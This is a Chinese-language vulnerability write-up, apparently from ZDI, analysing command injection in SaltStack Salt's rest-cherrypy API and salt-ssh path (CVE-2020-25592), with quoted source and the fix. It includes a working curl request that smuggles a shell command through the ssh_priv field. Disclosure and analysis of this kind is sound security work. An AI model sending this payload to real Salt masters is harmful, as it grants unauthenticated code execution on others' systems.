
深入分析SaltStack Salt命令注入漏洞






漏洞影响应用程序的rest-cherrypy netapi模块。rest-cherrypy模块为Salt提供REST API。该模块来源于Python的CherryPy模块,在默认情况下未启用。如果要启用rest-cherrypy模块,主配置文件/etc/salt/master中必须加入以下行:

rest_cherrypy:  Port: 8000  Disable_ssl: true

发送到/run API的POST请求将调用salt.netapi.rest_cherrypy.app.Run类的POST()方法,这个类最终会调用salt.netapi.NetapiClient的run()方法:

class NetapiClient(object):  # [... Truncated ...] 
salt.exceptions.SaltInvocationError( # "Invalid client specified: '{0}'".format(low.get("client")) "Invalid client specified: '{0}'".format(CLIENTS) )
if not ("token" in low or "eauth" in low): raise salt.exceptions.EauthAuthenticationError( "No authentication credentials given" )
if low.get("raw_shell") and not self.opts.get("netapi_allow_raw_shell"): raise salt.exceptions.EauthAuthenticationError( "Raw shell option not allowed." )
l_fun = getattr(self, low["client"]) f_call = salt.utils.args.format_call(l_fun, low) return l_fun(*f_call.get("args", ()), **f_call.get("kwargs", {}))
def local_batch(self, *args, **kwargs): """ Run :ref:`execution modules <all-salt.modules>` against batches of minions
.. versionadded:: 0.8.4
Wraps :py:meth:`salt.client.LocalClient.cmd_batch`
:return: Returns the result from the execution module for each batch of returns """ local = salt.client.get_local_client(mopts=self.opts) return local.cmd_batch(*args, **kwargs)
def ssh(self, *args, **kwargs): """ Run salt-ssh commands synchronously
Wraps :py:meth:`salt.client.ssh.client.SSHClient.cmd_sync`.
:return: Returns the result from the salt-ssh command """ ssh_client = salt.client.ssh.client.SSHClient( mopts=self.opts, disable_custom_roster=True ) return ssh_client.cmd_sync(kwargs)



class SSHClient(object):  # [... Truncated] 
def _prep_ssh( self, tgt, fun, arg=(), timeout=None, tgt_type="glob", kwarg=None, **kwargs ): """ Prepare the arguments """ opts = copy.deepcopy(self.opts) opts.update(kwargs) if timeout: opts["timeout"] = timeout arg = salt.utils.args.condition_input(arg, kwarg) opts["argv"] = [fun] + arg opts["selected_target_option"] = tgt_type opts["tgt"] = tgt return salt.client.ssh.SSH(opts)
def cmd( self, tgt, fun, arg=(), timeout=None, tgt_type="glob", kwarg=None, **kwargs ): ssh = self._prep_ssh(tgt, fun, arg, timeout, tgt_type, kwarg, **kwargs) #<-------------- calls ZDI-CAN-11143 final = {} for ret in ssh.run_iter(jid=kwargs.get("jid", None)): #<------------- ZDI-CAN-11173 final.update(ret) return final
def cmd_sync(self, low): kwargs = copy.deepcopy(low)
for ignore in ["tgt", "fun", "arg", "timeout", "tgt_type", "kwarg"]: if ignore in kwargs: del kwargs[ignore]
return self.cmd( low["tgt"], low["fun"], low.get("arg", []), low.get("timeout"), low.get("tgt_type"), low.get("kwarg"), **kwargs ) #<------------------- calls





curl -i $salt_ip_addr:8000/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"|id>/tmp/test#"}' 


SSH(object):  """  Create an SSH execution system  """ 
ROSTER_UPDATE_FLAG = "#__needs_update"
def __init__(self, opts): self.__parsed_rosters = {SSH.ROSTER_UPDATE_FLAG: True} pull_sock = os.path.join(opts["sock_dir"], "master_event_pull.ipc") if os.path.exists(pull_sock) and zmq: self.event = salt.utils.event.get_event( "master", opts["sock_dir"], opts["transport"], opts=opts, listen=False ) else: self.event = None self.opts = opts if self.opts["regen_thin"]: self.opts["ssh_wipe"] = True if not salt.utils.path.which("ssh"): raise salt.exceptions.SaltSystemExit( code=-1, msg="No ssh binary found in path -- ssh must be installed for salt-ssh to run. Exiting.", ) self.opts["_ssh_version"] = ssh_version() self.tgt_type = ( self.opts["selected_target_option"] if self.opts["selected_target_option"] else "glob" ) self._expand_target() self.roster = salt.roster.Roster(self.opts, self.opts.get("roster", "flat")) self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type) if not self.targets: self._update_targets() # If we're in a wfunc, we need to get the ssh key location from the # top level opts, stored in __master_opts__ if "__master_opts__" in self.opts: if self.opts["__master_opts__"].get("ssh_use_home_key") and os.path.isfile( os.path.expanduser("~/.ssh/id_rsa") ): priv = os.path.expanduser("~/.ssh/id_rsa") else: priv = self.opts["__master_opts__"].get( "ssh_priv", os.path.join( self.opts["__master_opts__"]["pki_dir"], "ssh", "salt-ssh.rsa" ), ) else: priv = self.opts.get( "ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa") ) if priv != "agent-forwarding": if not os.path.isfile(priv): try: salt.client.ssh.shell.gen_key(priv) except OSError: raise salt.exceptions.SaltClientError( "salt-ssh could not be run because it could not generate keys.\n\n" "You can probably resolve this by executing this script with " "increased permissions via sudo or by running as root.\n" "You could also use the '-c' option to supply a configuration " "directory that you have permissions to read and write to." )


def gen_key(path):  """  Generate a key for use with salt-ssh  """  cmd = 'ssh-keygen -P "" -f {0} -t rsa -q'.format(path)  if not os.path.isdir(os.path.dirname(path)):  os.makedirs(os.path.dirname(path))  subprocess.call(cmd, shell=True)



class SSH(object):  """  Create an SSH execution system  """ 
ROSTER_UPDATE_FLAG = "#__needs_update"
def __init__(self, opts): # [...]

self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type) if not self.targets: self._update_targets() # [...] self.defaults = { "user": self.opts.get( "ssh_user", salt.config.DEFAULT_MASTER_OPTS["ssh_user"] ), "port": self.opts.get( "ssh_port", salt.config.DEFAULT_MASTER_OPTS["ssh_port"] ), # <------------- vulnerable parameter "passwd": self.opts.get( "ssh_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_passwd"] ), "priv": priv, "priv_passwd": self.opts.get( "ssh_priv_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_priv_passwd"] ), "timeout": self.opts.get( "ssh_timeout", salt.config.DEFAULT_MASTER_OPTS["ssh_timeout"] ) + self.opts.get("timeout", salt.config.DEFAULT_MASTER_OPTS["timeout"]), "sudo": self.opts.get( "ssh_sudo", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo"] ), "sudo_user": self.opts.get( "ssh_sudo_user", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo_user"] ), "identities_only": self.opts.get( "ssh_identities_only", salt.config.DEFAULT_MASTER_OPTS["ssh_identities_only"], ), "remote_port_forwards": self.opts.get("ssh_remote_port_forwards"), # <------------- vulnerable parameter "ssh_options": self.opts.get("ssh_options"), # <------------- vulnerable parameter }
def _update_targets(self): """ Update targets in case hostname was directly passed without the roster. :return: """ hostname = self.opts.get("tgt", "") if "@" in hostname: user, hostname = hostname.split("@", 1) # <------------- vulnerable parameter else: user = self.opts.get("ssh_user") # <------------- vulnerable parameter if hostname == "*": hostname = ""
if salt.utils.network.is_reachable_host(hostname): hostname = salt.utils.network.ip_to_host(hostname) self.opts["tgt"] = hostname self.targets[hostname] = { "passwd": self.opts.get("ssh_passwd", ""), "host": hostname, "user": user, } if self.opts.get("ssh_update_roster"): self._update_roster()



def exec_cmd(self, cmd):  """  Execute a remote command  """  cmd = self._cmd_str(cmd) 
logmsg = "Executing command: {0}".format(cmd) if self.passwd: logmsg = logmsg.replace(self.passwd, ("*" * 6)) if 'decode("base64")' in logmsg or "base64.b64decode(" in logmsg: log.debug("Executed SHIM command. Command logged to TRACE") log.trace(logmsg) else: log.debug(logmsg)
ret = self._run_cmd(cmd) # <--------------- calls return ret
def _cmd_str(self, cmd, ssh="ssh"): """ Return the cmd string to execute """
# TODO: if tty, then our SSH_SHIM cannot be supplied from STDIN Will # need to deliver the SHIM to the remote host and execute it there
command = [ssh] if ssh != "scp": command.append(self.host) if self.tty and ssh == "ssh": command.append("-t -t") if self.passwd or self.priv: command.append(self.priv and self._key_opts() or self._passwd_opts()) if ssh != "scp" and self.remote_port_forwards: command.append( " ".join( [ "-R {0}".format(item) for item in self.remote_port_forwards.split(",") ] ) ) if self.ssh_options: command.append(self._ssh_opts())
return " ".join(command)
def _run_cmd(self, cmd, key_accept=False, passwd_retries=3): # [...]
term = salt.utils.vt.Terminal( cmd, shell=True, log_stdout=True, log_stdout_level="trace", log_stderr=True, log_stderr_level="trace", stream_stdout=False, stream_stderr=False, ) sent_passwd = 0 send_password = True ret_stdout = "" ret_stderr = "" old_stdout = ""
try: while term.has_unread_data: stdout, stderr = term.recv()





CVE-2020-25592的修复原理是添加对eauth和token参数的验证,以此来修复漏洞。这样一来,就仅允许有效用户通过rest-cherrypy netapi模块访问salt-ssh功能。这是我们的ZDI项目中收到的第一个SaltStack漏洞,后续的工作也非常重要。我们期待以后能接收到更多的提交报告。

大家可以关注我的Twitter @ nktropy,跟进团队研究进展,获取最新的漏洞利用技术和安全补丁。


